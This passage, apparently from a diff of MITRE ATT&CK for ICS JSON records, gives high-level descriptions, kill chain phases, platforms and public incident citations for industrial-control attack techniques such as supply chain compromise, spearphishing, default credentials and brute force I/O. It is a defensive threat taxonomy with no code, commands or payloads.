This may involve the compromise and replacement of legitimate software and patches, such as on third party or vendor websites. Targeting of supply chain compromise can be done in attempts to infiltrate the environments of a specific audience. In control systems environments with assets in both the IT and OT networks, it is possible a supply chain compromise affecting the IT environment could enable further access to the OT environment. \n\nCounterfeit devices may be introduced to the global supply chain posing safety and cyber risks to asset owners and operators. These devices may not meet the safety, engineering and manufacturing requirements of regulatory bodies but may feature tagging indicating conformance with industry standards. Due to the lack of adherence to standards and overall lesser quality, the counterfeit products may pose a serious safety and operational risk. (Citation: Control Global May 2019) \n\nYokogawa identified instances in which their customers received counterfeit differential pressure transmitters using the Yokogawa logo. The counterfeit transmitters were nearly indistinguishable with a semblance of functionality and interface that mimics the genuine product. (Citation: Control Global May 2019) \n\nF-Secure Labs analyzed the approach the adversary used to compromise victim systems with Havex. (Citation: Daavid Hentunen, Antti Tikkanen June 2014) The adversary planted trojanized software installers available on legitimate ICS/SCADA vendor websites. 
After being downloaded, this software infected the host computer with a Remote Access Trojan (RAT).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Control Server", + "Data Historian", + "Field Controller/RTU/PLC/IED", + "Human-Machine Interface", + "Input/Output Server", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "File: File Metadata" + ], + "type": "attack-pattern", + "id": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0862", + "external_id": "T0862" + }, + { + "source_name": "Control Global May 2019", + "description": "Control Global 2019, May 29 Yokogawa announcement warns of counterfeit transmitters Retrieved. 2021/04/09 ", + "url": "https://www.controlglobal.com/industrynews/2019/yokogawa-announcement-warns-of-counterfeit-transmitters/" + }, + { + "source_name": "Daavid Hentunen, Antti Tikkanen June 2014", + "description": "Daavid Hentunen, Antti Tikkanen 2014, June 23 Havex Hunts For ICS/SCADA Systems Retrieved. 
2019/04/01 ", + "url": "https://www.f-secure.com/weblog/archives/00002718.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Serial Connection Enumeration", + "description": "Adversaries may perform serial connection enumeration to gather situational awareness after gaining access to devices in the OT network. Control systems devices often communicate to each other via various types of serial communication mediums. These serial communications are used to facilitate informational communication, as well as commands. Serial Connection Enumeration differs from I/O Module Discovery, as I/O modules are auxiliary systems to the main system, and devices that are connected via serial connection are normally discrete systems.\n\nWhile IT and OT networks may work in tandem, the exact structure of the OT network may not be discernible from the IT network alone. After gaining access to a device on the OT network, an adversary may be able to enumerate the serial connections. From this perspective, the adversary can see the specific physical devices to which the compromised device is connected to. 
This gives the adversary greater situational awareness and can influence the actions that the adversary can take in an attack.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Input/Output Server", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--5f3da2f3-91c8-4d8b-a02f-bf43a11def55", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0854", + "external_id": "T0854" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Loss of Safety", + "description": "Adversaries may compromise safety system functions designed to maintain safe operation of a process when unacceptable or dangerous conditions occur. Safety systems are often composed of the same elements as control systems but have the sole purpose of ensuring the process fails in a predetermined safe manner. \n\nMany unsafe conditions in process control happen too quickly for a human operator to react to. Speed is critical in correcting these conditions to limit serious impacts such as Loss of Control and Property Damage. \n\nAdversaries may target and disable safety system functions as a prerequisite to subsequent attack execution or to allow for future unsafe conditionals to go unchecked. Detection of a Loss of Safety by operators can result in the shutdown of a process due to strict policies regarding safety systems. 
This can cause a Loss of Productivity and Revenue and may meet the technical goals of adversaries seeking to cause process disruptions.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--5fa00fdd-4a55-4191-94a0-564181d7fec2", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0880", + "external_id": "T0880" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Loss of Productivity and Revenue", + "description": "Adversaries may cause loss of productivity and revenue through disruption and even damage to the availability and integrity of control system operations, devices, and related processes. This technique may manifest as a direct effect of an ICS-targeting attack or tangentially, due to an IT-targeting attack against non-segregated environments. \n\nIn cases where these operations or services are brought to a halt, the loss of productivity may eventually present an impact for the end-users or consumers of products and services. The disrupted supply-chain may result in supply shortages and increased prices, among other consequences. \n\nA ransomware attack on an Australian beverage company resulted in the shutdown of some manufacturing sites, including precautionary halts to protect key systems. 
(Citation: Paganini, Pierluigi June 2020) The company announced the potential for temporary shortages of their products following the attack. (Citation: Paganini, Pierluigi June 2020) (Citation: Lion Corporation June 2020) \n\nIn the 2021 Colonial Pipeline ransomware incident, the pipeline was unable to transport approximately 2.5 million barrels of fuel per day to the East Coast. (Citation: Colonial Pipeline Company May 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--63b6942d-8359-4506-bfb3-cf87aa8120ee", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0828", + "external_id": "T0828" + }, + { + "source_name": "Colonial Pipeline Company May 2021", + "description": "Colonial Pipeline Company 2021, May Media Statement Update: Colonial Pipeline System Disruption Retrieved. 2021/10/08 ", + "url": "https://www.colpipe.com/news/press-releases/media-statement-colonial-pipeline-system-disruption" + }, + { + "source_name": "Lion Corporation June 2020", + "description": "Lion Corporation 2020, June 26 Lion Cyber incident update: 26 June 2020 Retrieved. 2021/10/08 ", + "url": "https://lionco.com/2020/06/26/lion-update-re-cyber-issue/" + }, + { + "source_name": "Paganini, Pierluigi June 2020", + "description": "Paganini, Pierluigi 2020, June 14 Ransomware attack disrupts operations at Australian beverage company Lion Retrieved. 
2021/10/08 ", + "url": "https://securityaffairs.co/wordpress/104749/cyber-crime/ransomware-attack-hit-lion.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Spearphishing Attachment", + "description": "Adversaries may use a spearphishing attachment, a variant of spearphishing, as a form of a social engineering attack against specific targets. Spearphishing attachments are different from other forms of spearphishing in that they employ malware attached to an email. All forms of spearphishing are electronically delivered and target a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T0863) to gain execution and access. (Citation: Enterprise ATT&CK October 2019) \n\nA Chinese spearphishing campaign running from December 9, 2011 through February 29, 2012, targeted ONG organizations and their employees. The emails were constructed with a high level of sophistication to convince employees to open the malicious file attachments. 
(Citation: CISA AA21-201A Pipeline Intrusion July 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Engineering Workstation", + "Human-Machine Interface", + "Control Server", + "Data Historian" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "File: File Creation", + "Application Log: Application Log Content", + "Process: Process Creation" + ], + "type": "attack-pattern", + "id": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0865", + "external_id": "T0865" + }, + { + "source_name": "CISA AA21-201A Pipeline Intrusion July 2021", + "description": "Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA) 2021, July 20 Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013 Retrieved. 2021/10/08 ", + "url": "https://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdf" + }, + { + "source_name": "Enterprise ATT&CK October 2019", + "description": "Enterprise ATT&CK 2019, October 25 Spearphishing Attachment Retrieved. 
2019/10/25 ", + "url": "https://attack.mitre.org/techniques/T1193/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Location Identification", + "description": "Adversaries may perform location identification using device data to inform operations and targeted impact for attacks. Location identification data can come in a number of forms, including geographic location, location relative to other control system devices, time zone, and current time. An adversary may use an embedded global positioning system (GPS) module in a device to figure out the physical coordinates of a device. NIST SP800-82 recommends that devices utilize GPS or another location determining mechanism to attach appropriate timestamps to log entries (Citation: Guidance - NIST SP800-82). While this assists in logging and event tracking, an adversary could use the underlying positioning mechanism to determine the general location of a device. An adversary can also infer the physical location of serially connected devices by using serial connection enumeration. \n\nAn adversary attempt to attack and cause Impact could potentially affect other control system devices in close proximity. 
Device local-time and time-zone settings can also provide adversaries a rough indicator of device location, when specific geographic identifiers cannot be determined from the system.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Control Server" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--7374ab87-0782-41f8-b415-678c0950bb2a", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0825", + "external_id": "T0825" + }, + { + "source_name": "Guidance - NIST SP800-82", + "description": "Keith Stouffer. (2015, May). Guide to Industrial Control Systems (ICS) Security. Retrieved March 28, 2018.", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Drive-by Compromise", + "description": "Adversaries may gain access to a system during a drive-by compromise, when a user visits a website as part of a regular browsing session. With this technique, the user's web browser is targeted and exploited simply by visiting the compromised website. \n\nThe adversary may target a specific community, such as trusted third party suppliers or other industry specific groups, which often visit the target website. This kind of targeted attack relies on a common interest, and is known as a strategic web compromise or watering hole attack. 
\n\nThe National Cyber Awareness System (NCAS) has issued a Technical Alert (TA) regarding Russian government cyber activity targeting critical infrastructure sectors. (Citation: Cybersecurity & Infrastructure Security Agency March 2018) Analysis by DHS and FBI has noted two distinct categories of victims in the Dragonfly campaign on the Western energy sector: staging and intended targets. The adversary targeted the less secure networks of staging targets, including trusted third-party suppliers and related peripheral organizations. Initial access to the intended targets used watering hole attacks to target process control, ICS, and critical infrastructure related trade publications and informational websites.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Process: Process Creation", + "Network Traffic: Network Connection Creation", + "Application Log: Application Log Content", + "File: File Creation", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0817", + "external_id": "T0817" + }, + { + "source_name": "Cybersecurity & Infrastructure Security Agency March 2018", + "description": "Cybersecurity & Infrastructure Security Agency 2018, March 15 Alert (TA18-074A) Russian Government Cyber Activity Targeting Energy and 
Other Critical Infrastructure Sectors Retrieved. 2019/10/11 ", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-074A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:14:42.829Z", + "name": "Damage to Property", + "description": "Adversaries may cause damage and destruction of property to infrastructure, equipment, and the surrounding environment when attacking control systems. This technique may result in device and operational equipment breakdown, or represent tangential damage from other techniques used in an attack. Depending on the severity of physical damage and disruption caused to control processes and systems, this technique may result in [Loss of Safety](https://attack.mitre.org/techniques/T0880). Operations that result in [Loss of Control](https://attack.mitre.org/techniques/T0827) may also cause damage to property, which may be directly or indirectly motivated by an adversary seeking to cause impact in the form of [Loss of Productivity and Revenue](https://attack.mitre.org/techniques/T0828). \n\n\nThe German Federal Office for Information Security (BSI) reported a targeted attack on a steel mill under an incidents affecting business section of its 2014 IT Security Report. (Citation: BSI State of IT Security 2014) These targeted attacks affected industrial operations and resulted in breakdowns of control system components and even entire installations. As a result of these breakdowns, massive impact and damage resulted from the uncontrolled shutdown of a blast furnace. \n\nA Polish student used a remote controller device to interface with the Lodz city tram system in Poland. (Citation: John Bill May 2017) (Citation: Shelley Smith February 2008) (Citation: Bruce Schneier January 2008) Using this remote, the student was able to capture and replay legitimate tram signals. This resulted in damage to impacted trams, people, and the surrounding property. 
Reportedly, four trams were derailed and were forced to make emergency stops. (Citation: Shelley Smith February 2008) Commands issued by the student may have also resulted in tram collisions, causing harm to those on board and the environment outside. (Citation: Bruce Schneier January 2008)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "type": "attack-pattern", + "id": "attack-pattern--83ebd22f-b401-4d59-8219-2294172cf916", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0879", + "external_id": "T0879" + }, + { + "source_name": "Bruce Schneier January 2008", + "description": "Bruce Schneier 2008, January 17 Hacking Polish Trams Retrieved. 2019/10/17 ", + "url": "https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html" + }, + { + "source_name": "BSI State of IT Security 2014", + "description": "Bundesamt fr Sicherheit in der Informationstechnik (BSI) (German Federal Office for Information Security) 2014 Die Lage der IT-Sicherheit in Deutschland 2014 (The State of IT Security in Germany) Retrieved. 2019/10/30 ", + "url": "https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Securitysituation/IT-Security-Situation-in-Germany-2014.pdf?__blob=publicationFile&v=3" + }, + { + "source_name": "John Bill May 2017", + "description": "John Bill 2017, May 12 Hacked Cyber Security Railways Retrieved. 
2019/10/17 ", + "url": "https://www.londonreconnections.com/2017/hacked-cyber-security-railways/" + }, + { + "source_name": "Shelley Smith February 2008", + "description": "Shelley Smith 2008, February 12 Teen Hacker in Poland Plays Trains and Derails City Tram System Retrieved. 2019/10/17 ", + "url": "https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-30T20:19:14.351Z", + "name": "Spoof Reporting Message", + "description": "Adversaries may spoof reporting messages in control system environments for evasion and to impair process control. In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. Reporting messages are important for monitoring the normal operation of a system or identifying important events such as deviations from expected values. \n\nIf an adversary has the ability to Spoof Reporting Messages, they can impact the control system in many ways. The adversary can Spoof Reporting Messages that state that the process is operating normally, as a form of evasion. The adversary could also Spoof Reporting Messages to make the defenders and operators think that other errors are occurring in order to distract them from the actual source of a problem. 
(Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "evasion" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Control Server" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Windows Registry: Windows Registry Key Modification", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow", + "Operational Databases: Device Alarm" + ], + "type": "attack-pattern", + "id": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0856", + "external_id": "T0856" + }, + { + "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011", + "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ", + "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Exploitation of Remote Services", + "description": "Adversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to enable remote service abuse. 
A common goal for post-compromise exploitation of remote services is for initial access into and lateral movement throughout the ICS environment to enable access to targeted systems. (Citation: Enterprise ATT&CK)\n\nICS asset owners and operators have been affected by ransomware (or disruptive malware masquerading as ransomware) migrating from enterprise IT to ICS environments: WannaCry, NotPetya, and BadRabbit. In each of these cases, self-propagating (wormable) malware initially infected IT networks, but through exploit (particularly the SMBv1-targeting MS17-010 vulnerability) spread to industrial networks, producing significant impacts. (Citation: Joe Slowik April 2019)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Data Historian", + "Engineering Workstation" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0866", + "external_id": "T0866" + }, + { + "source_name": "Enterprise ATT&CK", + "description": "Enterprise ATT&CK Exploitation of Remote Services Retrieved. 
2019/10/27 ", + "url": "https://attack.mitre.org/techniques/T1210/" + }, + { + "source_name": "Joe Slowik April 2019", + "description": "Joe Slowik 2019, April 10 Implications of IT Ransomware for ICS Environments Retrieved. 2019/10/27 ", + "url": "https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Default Credentials", + "description": "Adversaries may leverage manufacturer or supplier set default credentials on control system devices. These default credentials may have administrative permissions and may be necessary for initial configuration of the device. It is general best practice to change the passwords for these accounts as soon as possible, but some manufacturers may have devices that have passwords or usernames that cannot be changed. (Citation: Keith Stouffer May 2015)\n\nDefault credentials are normally documented in an instruction manual that is either packaged with the device, published online through official means, or published online through unofficial means. 
Adversaries may leverage default credentials that have not been properly modified or disabled.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay", + "Control Server", + "Engineering Workstation" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Logon Session: Logon Session Creation", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0812", + "external_id": "T0812" + }, + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:16:55.602Z", + "name": "External Remote Services", + "description": "Adversaries may leverage external remote services as a point of initial access into your network. These services allow users to connect to internal network resources from external locations. Examples are VPNs, Citrix, and other access mechanisms. Remote service gateways often manage connections and credential authentication for these services. 
(Citation: Daniel Oakley, Travis Smith, Tripwire)\n\nExternal remote services allow administration of a control system from outside the system. Often, vendors and internal engineering groups have access to external remote services to control system networks via the corporate network. In some cases, this access is enabled directly from the internet. While remote access enables ease of maintenance when a control system is in a remote area, compromise of remote access solutions is a liability. The adversary may use these services to gain access to and execute attacks against a control system network. Access to valid accounts is often a requirement. \n\nAs they look for an entry point into the control system network, adversaries may begin searching for existing point-to-point VPN implementations at trusted third party networks or through remote support employee connections where split tunneling is enabled. (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Control Server", + "Input/Output Server" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Logon Session: Logon Session Metadata", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0822", + "external_id": "T0822" + }, + { + "source_name": "Daniel Oakley, Travis Smith, Tripwire", + "description": 
"Daniel Oakley, Travis Smith, Tripwire Retrieved. 2018/05/30 ", + "url": "https://attack.mitre.org/wiki/Technique/T1133" + }, + { + "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016", + "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ", + "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-29T16:17:27.903Z", + "name": "Brute Force I/O", + "description": "Adversaries may repetitively or successively change I/O point values to perform an action. Brute Force I/O may be achieved by changing either a range of I/O point values or a single point value repeatedly to manipulate a process function. The adversary's goal and the information they have about the target environment will influence which of the options they choose. In the case of brute forcing a range of point values, the adversary may be able to achieve an impact without targeting a specific point. In the case where a single point is targeted, the adversary may be able to generate instability on the process function associated with that particular point. \n\nAdversaries may use Brute Force I/O to cause failures within various industrial processes. 
These failures could be the result of wear on equipment or damage to downstream equipment.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Control Server", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Operational Databases: Process History/Live Data", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0806", + "external_id": "T0806" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Detect Program State", + "description": "Adversaries may seek to gather information about the current state of a program on a PLC. State information reveals information about the program, including whether it's running, halted, stopped, or has generated an exception. 
